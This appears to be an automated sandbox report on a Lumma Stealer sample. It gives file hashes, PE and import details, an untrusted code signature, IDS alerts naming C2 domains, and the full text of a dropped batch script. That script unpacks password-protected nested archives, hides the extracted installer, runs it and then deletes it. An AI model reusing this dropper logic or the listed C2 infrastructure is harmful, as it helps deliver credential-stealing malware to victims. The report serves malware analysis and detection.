                                                                                                                                      Preview:PK..........uYB..r+~..+~......file_1.zipPK..........uY.)^..}..8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...~u.(.=.&.&.F...KR....Qu....?...@..-...s.{..u..q......*.S......j....v....6....!.,..k.....*.....Ab..x..$.r.u.....!9.{._1.q........e..G....>...j..M.#...1K.....|...y7.1v1.....S..n.......+A.&...{..Y.3(..`P.:[B.dg.2.<..A......7".v6 ,....V....f..U.....l9.u...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d...
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753503
                                                                                                                                      Entropy (8bit):7.997716021291246
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:12288:m9pEORLcBL72DpwhpHzawQ/3tTfcjU0ZWri9KL0oVh:kRLcl73h5aJtfKU0Yri9A/
                                                                                                                                      MD5:D5779B3F2C5AABF196D0B6292473E64D
                                                                                                                                      SHA1:51C3140D860182BD7B61D2A79BBA1E1961CD01E2
                                                                                                                                      SHA-256:F9A01E32A05911FD847822DAE4C55A326D8FE136B07CE68904FEC07CFBD1AD37
                                                                                                                                      SHA-512:2358F28AAC9FF742A893D74D3AC8E2B054C86F47020EEF9B09D114253D4E64F73EB3541043A5696D5AB2C0A0854A2FF832E643D2F85C14488AF8656E34F27635
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........uY4;..~...~......file_2.zipPK..........uYB..r+~..+~......file_1.zipPK..........uY.)^..}..8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...~u.(.=.&.&.F...KR....Qu....?...@..-...s.{..u..q......*.S......j....v....6....!.,..k.....*.....Ab..x..$.r.u.....!9.{._1.q........e..G....>...j..M.#...1K.....|...y7.1v1.....S..n.......+A.&...{..Y.3(..`P.:[B.dg.2.<..A......7".v6 ,....V....f..U.....l9.u...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2426095
                                                                                                                                      Entropy (8bit):7.998404992730004
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:49152:LujCK3D0AC/l5mwbBkDWYb1ZN4UJ9oKcl7RgtGYr/2:LaR3D0Ae5mwdkDWm1XoKcl7+t92
                                                                                                                                      MD5:6E04EFEE8E6DF916933215D9AABAE042
                                                                                                                                      SHA1:1F6FAEFE1DA576D29F842702504D4EF721D62998
                                                                                                                                      SHA-256:C41E5D3DD6F0A2FEABAC65CEC0E483FE88447C11B6AED134813F7D0597EDACA4
                                                                                                                                      SHA-512:2CB413CCBD45BF4AD593AE023DC8C33442CF86E075C902389C933CB03F2F31D5242C348FEAFE0108437D1A99AB19E3D053C26990E01BA806066093AB212E7E85
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........uY..4.p.....#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2426261
                                                                                                                                      Entropy (8bit):7.999913059933208
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:49152:2L5CKmkotjbkJKDog57WlBE5Q8auyAuifhjqIdPh4tGpx6ge:o5CjbkeUPE5YaPfhquJ4tu3e
                                                                                                                                      MD5:20696D307F6B19D3094724A2C845551B
                                                                                                                                      SHA1:04DFC0D64983F8834D382025C870777D93855FE9
                                                                                                                                      SHA-256:666BD2360B3750697BFC114EBC1E43604B25659B8A865EB2F24D5C358D1880BB
                                                                                                                                      SHA-512:A2AF70EAEF93AB608D84D09A984F0A52076D7F430F504178E34028CA6D7745E772BEC9AAD7F2BEC584E11C86CD429E05844B1C0596804F54FB1758FB15965FE1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........uY.....%...%.....file_4.zip.).zsS..../ .....6.7...MUQ:;)$.cl....{..'....D-O.KR..(...KS....*.....]%$.t8....W.U..%...9...\....;.P.\:u..R.+.)'.....m......Ui.G.)...W..M..R....nG......9x}}...O.)..$.S..e5....-..<.F....0Z|..x.......x..R...{..w..).XxP...2...bt...a. ..(5....3P..~.1.Ba.H.%2.OS..R#......0=......R....f..Z..+e.....^f.P.)...Da*.P^.;S......F.I.FNcD.F..E...^.N.H.1.|u....+..S....T..,.j...7e..J.....aFE..?.].L....g5...*..&..^W..=.......*O........D.."4..;...m.4.=....W.....Y..h..6.[c.=.E.xyN...z".z...lQG|..l}tr...6f....!...U.yg....a.Q....c.r.'@........Q..U..&Ez..V.z...]>M...U.].x.*.Uh...]..fm....Mz.u....+O..-....G,..B:...D.......&.]...........K@...TGf.^....\\...=?.V\8....K..S~.w...&".5RU...........w4~.r.Y.U.VH.Zxy\.=-..`..*...#.[....q-.X.ei.X..L] C....Vk.>....Oc...Z.@A`......!K..=.,&.....m........K...A..Z.........I]..[<..bh....s.R....#8.s...- :.%.../.GO.{..F........2.f.(..aFuNT..p\.Kd6.9)?.j\.\..ys@B..%.......0..C.....<i....{..0.M..
                                                                                                                                      Process:C:\Windows\System32\cmd.exe
                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2426261
                                                                                                                                      Entropy (8bit):7.999913059933208
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:49152:2L5CKmkotjbkJKDog57WlBE5Q8auyAuifhjqIdPh4tGpx6ge:o5CjbkeUPE5YaPfhquJ4tu3e
                                                                                                                                      MD5:20696D307F6B19D3094724A2C845551B
                                                                                                                                      SHA1:04DFC0D64983F8834D382025C870777D93855FE9
                                                                                                                                      SHA-256:666BD2360B3750697BFC114EBC1E43604B25659B8A865EB2F24D5C358D1880BB
                                                                                                                                      SHA-512:A2AF70EAEF93AB608D84D09A984F0A52076D7F430F504178E34028CA6D7745E772BEC9AAD7F2BEC584E11C86CD429E05844B1C0596804F54FB1758FB15965FE1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:PK..........uY.....%...%.....file_4.zip.).zsS..../ .....6.7...MUQ:;)$.cl....{..'....D-O.KR..(...KS....*.....]%$.t8....W.U..%...9...\....;.P.\:u..R.+.)'.....m......Ui.G.)...W..M..R....nG......9x}}...O.)..$.S..e5....-..<.F....0Z|..x.......x..R...{..w..).XxP...2...bt...a. ..(5....3P..~.1.Ba.H.%2.OS..R#......0=......R....f..Z..+e.....^f.P.)...Da*.P^.;S......F.I.FNcD.F..E...^.N.H.1.|u....+..S....T..,.j...7e..J.....aFE..?.].L....g5...*..&..^W..=.......*O........D.."4..;...m.4.=....W.....Y..h..6.[c.=.E.xyN...z".z...lQG|..l}tr...6f....!...U.yg....a.Q....c.r.'@........Q..U..&Ez..V.z...]>M...U.].x.*.Uh...]..fm....Mz.u....+O..-....G,..B:...D.......&.]...........K@...TGf.^....\\...=?.V\8....K..S~.w...&".5RU...........w4~.r.Y.U.VH.Zxy\.=-..`..*...#.[....q-.X.ei.X..L] C....Vk.>....Oc...Z.@A`......!K..=.,&.....m........K...A..Z.........I]..[<..bh....s.R....#8.s...- :.%.../.GO.{..F........2.f.(..aFuNT..p\.Kd6.9)?.j\.\..ys@B..%.......0..C.....<i....{..0.M..
                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):474
                                                                                                                                      Entropy (8bit):5.0920186757800545
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:QUp+CF16g64CTFMj2LIQLv2u2W+CVGrMLvmuCCgXjgrXgX78agXrrEOXUigXY:QUpNF16g632CkeuW+CVGYTtS0rXS78as
                                                                                                                                      MD5:B14620F36E8D77E3A1BB6A92121E3279
                                                                                                                                      SHA1:BCA0B9FCD9571794ED27087EDC1E777964263768
                                                                                                                                      SHA-256:45A58F7A7CC5A7BFE8C5B7D1FCAC799C9B6CD5B7CC07ADB7A517FCCA512451B8
                                                                                                                                      SHA-512:B4C2D995527CC7D5909A9141D3D74DCD86C7CD74448A572298BF3D537A2527A5B36C45E725D2A14770CECE73617D58E7ECD7CFD8D1060DFF10CAAFDB1A141F1A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p1299923009167529232566422481 -oextracted ..for /l %%i in (4,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "Installer.exe" ../..cd....rd /s /q extracted..attrib +H "Installer.exe"..start "" "Installer.exe"..cls..echo Launched 'Installer.exe'...pause..del /f /q "Installer.exe"..
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):345
                                                                                                                                      Entropy (8bit):5.081543932238743
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBKFSTgqF1AivwtHgN1Ffpap1tNZTe:pMpDh5RwXfTgqFyYwsJA1tNw
                                                                                                                                      MD5:E06A9F5D5632CE2FB131A885580E1BDF
                                                                                                                                      SHA1:BB2348087381D375857ECC8F6A93BCC3DA961936
                                                                                                                                      SHA-256:DFB78CB4FB72B09F98864B1823B33A53EF90CF29AE3F842509AB829A647DEEAB
                                                                                                                                      SHA-512:E5C584911C7BA58E8361611A602F037EA0EB9B7D5FD449FEE48463F85B72FB6282FA94A9DFF5002B9F0560716F10735CE456154E6094D55FD23950461BB562F8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 753195 bytes (736 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 753195.... 0%. .Everything is Ok....Size: 918840..Compressed: 753195..
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.991693232431377
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:file.exe
                                                                                                                                      File size:3'376'184 bytes
                                                                                                                                      MD5:b570fcbe697ef79db835d9b654974874
                                                                                                                                      SHA1:cf82bcfafbd35a42a4cb7893b4acae9941ee9f5a
                                                                                                                                      SHA256:34255258fadbcfaa0d061722ae85b5e25bcc3b90f2f10825b75d0cb4f27e1a8b
                                                                                                                                      SHA512:4226fd46a072458e4520a5db5849ed1d38fe2d960a9ffe1a91aa6db079110dc69c5648e32deb0da9f9c139d8fa59ca2a324748405b390fd29ae48ef78bbd8470
                                                                                                                                      SSDEEP:98304:hQ5YSVL1XX+63mAEQXoODvgikZmYYwlLCbm1ty7Of9fIES:hQxX5fEQ4KI4YYkLCbUtysO
                                                                                                                                      TLSH:5DF53393776E80B5F04661763CD5BBE922E0EA258F26C5C3C7596D0CEE903C528B91CB
                                                                                                                                      File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@.................................iE4..............................................0...O..........PD3..?.
                                                                                                                                      Icon Hash:00828e8e8686b000
                                                                                                                                      Entrypoint:0x41945f
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:true
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:
                                                                                                                                      Time Stamp:0x4FC33FCE [Mon May 28 09:05:18 2012 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:f6baa5eaa8231d4fe8e922a2e6d240ea
                                                                                                                                      Signature Valid:false
                                                                                                                                      Signature Issuer:CN=Ballda Company, E=Ballda Company, O=Ballda Company, L=Ballda Company, C=BR
                                                                                                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                      Error Number:-2146762487
                                                                                                                                      Not Before, Not After
                                                                                                                                      • 12/11/2024 19:00:00 12/11/2026 19:00:00
                                                                                                                                      Subject Chain
                                                                                                                                      • CN=Ballda Company, E=Ballda Company, O=Ballda Company, L=Ballda Company, C=BR
                                                                                                                                      Version:3
                                                                                                                                      Thumbprint MD5:68B6357951E516EE8E2058916B2B8605
                                                                                                                                      Thumbprint SHA-1:EAEF924D8294423B4E5BBCFEFC74DE57BCC8800F
                                                                                                                                      Thumbprint SHA-256:360814DB207B223D092443B89DBED00982EDBB3C33C2CE6D943869C241F8CE6A
                                                                                                                                      Serial:0ACF735D55B327A6
                                                                                                                                      Instruction
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push FFFFFFFFh
                                                                                                                                      push 0041C480h
                                                                                                                                      push 004195F0h
                                                                                                                                      mov eax, dword ptr fs:[00000000h]
                                                                                                                                      push eax
                                                                                                                                      mov dword ptr fs:[00000000h], esp
                                                                                                                                      sub esp, 68h
                                                                                                                                      push ebx
                                                                                                                                      push esi
                                                                                                                                      push edi
                                                                                                                                      mov dword ptr [ebp-18h], esp
                                                                                                                                      xor ebx, ebx
                                                                                                                                      mov dword ptr [ebp-04h], ebx
                                                                                                                                      push 00000002h
                                                                                                                                      call dword ptr [0041A1E0h]
                                                                                                                                      pop ecx
                                                                                                                                      or dword ptr [00422DE4h], FFFFFFFFh
                                                                                                                                      or dword ptr [00422DE8h], FFFFFFFFh
                                                                                                                                      call dword ptr [0041A1E4h]
                                                                                                                                      mov ecx, dword ptr [00420DCCh]
                                                                                                                                      mov dword ptr [eax], ecx
                                                                                                                                      call dword ptr [0041A1E8h]
                                                                                                                                      mov ecx, dword ptr [00420DC8h]
                                                                                                                                      mov dword ptr [eax], ecx
                                                                                                                                      mov eax, dword ptr [0041A1ECh]
                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                      mov dword ptr [00422DE0h], eax
                                                                                                                                      call 00007FD729435BD2h
                                                                                                                                      cmp dword ptr [0041E950h], ebx
                                                                                                                                      jne 00007FD729435ABEh
                                                                                                                                      push 004195E8h
                                                                                                                                      call dword ptr [0041A1F0h]
                                                                                                                                      pop ecx
                                                                                                                                      call 00007FD729435BA4h
                                                                                                                                      push 0041E070h
                                                                                                                                      push 0041E06Ch
                                                                                                                                      call 00007FD729435B8Fh
                                                                                                                                      mov eax, dword ptr [00420DC4h]
                                                                                                                                      mov dword ptr [ebp-6Ch], eax
                                                                                                                                      lea eax, dword ptr [ebp-6Ch]
                                                                                                                                      push eax
                                                                                                                                      push dword ptr [00420DC0h]
                                                                                                                                      lea eax, dword ptr [ebp-64h]
                                                                                                                                      push eax
                                                                                                                                      lea eax, dword ptr [ebp-70h]
                                                                                                                                      push eax
                                                                                                                                      lea eax, dword ptr [ebp-60h]
                                                                                                                                      push eax
                                                                                                                                      call dword ptr [0041A1F8h]
                                                                                                                                      push 0041E068h
                                                                                                                                      push 0041E000h
                                                                                                                                      call 00007FD729435B5Ch
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1c9840xc8.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000x4f10.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x3344500x3fe8
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x1a0000x36c.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x18e0e0x19000e0f514ea8a1fc2a6d0def6d885d7282fFalse0.6029296875data6.656006728000525IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x1a0000x3bda0x3c00d084871adc0cd9263e4a1811b8fc40faFalse0.45553385416666664data5.725242374702596IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x1e0000x4dec0xa008c42b68006a121b1b9ebd199e2e59ca5False0.50546875data4.442014356812219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0x230000x4f100x50008e87ec874b331d45ea1bc29c4dd625aeFalse0.101171875data3.928210125043096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0x231c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.0975177304964539
                                                                                                                                      RT_ICON0x236280x9b8Device independent bitmap graphic, 24 x 48 x 32, image size 2448RussianRussia0.10008038585209003
                                                                                                                                      RT_ICON0x23fe00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352RussianRussia0.061930783242258654
                                                                                                                                      RT_ICON0x251080x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792RussianRussia0.04017493897477624
                                                                                                                                      RT_GROUP_ICON0x277700x3edataRussianRussia0.8387096774193549
                                                                                                                                      RT_VERSION0x277b00x418data0.46087786259541985
                                                                                                                                      RT_MANIFEST0x27bc80x346ASCII text, with CRLF line terminatorsEnglishUnited States0.5071599045346062
                                                                                                                                      DLLImport
                                                                                                                                      COMCTL32.dll
                                                                                                                                      SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                                                                                                      GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                                                                                      ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                                                                                                      USER32.dllGetWindowLongW, GetMenu, SetWindowPos, GetWindowDC, ReleaseDC, GetDlgItem, GetParent, GetWindowRect, GetClassNameA, CreateWindowExW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, SendMessageW, EndDialog, wsprintfW, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, MessageBoxA, ScreenToClient, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, CreateWindowExA, wvsprintfW, CharUpperW, GetKeyState, CopyImage
                                                                                                                                      ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                                                                                      OLEAUT32.dllVariantClear, SysFreeString, OleLoadPicture, SysAllocString
                                                                                                                                      KERNEL32.dllGetFileSize, SetFilePointer, ReadFile, WaitForMultipleObjects, GetModuleHandleA, SetFileTime, SetEndOfFile, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, GetProcAddress, GetModuleHandleW, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetStartupInfoA
                                                                                                                                      MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _wtol, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _purecall
                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                      RussianRussia
                                                                                                                                      EnglishUnited States
                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                      2024-11-22T05:02:06.219890+01002057668ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs)1192.168.2.5631231.1.1.153UDP
                                                                                                                                      2024-11-22T05:02:06.219890+01002057697ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs)1192.168.2.5631231.1.1.153UDP
                                                                                                                                      2024-11-22T05:02:06.453678+01002057658ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs)1192.168.2.5498171.1.1.153UDP
                                                                                                                                      2024-11-22T05:02:08.103646+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549707172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:08.103646+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:08.832943+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549707172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:08.832943+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:10.178731+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549708172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:10.178731+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:11.039904+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549708172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:11.039904+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549708172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:12.507354+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549709172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:12.507354+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:14.687563+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549710172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:14.687563+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:16.846185+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549712172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:16.846185+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:19.116598+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549715172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:19.116598+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:19.848871+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549715172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:21.483449+01002057659ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI)1192.168.2.549723172.67.206.172443TCP
                                                                                                                                      2024-11-22T05:02:21.483449+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549723172.67.206.172443TCP
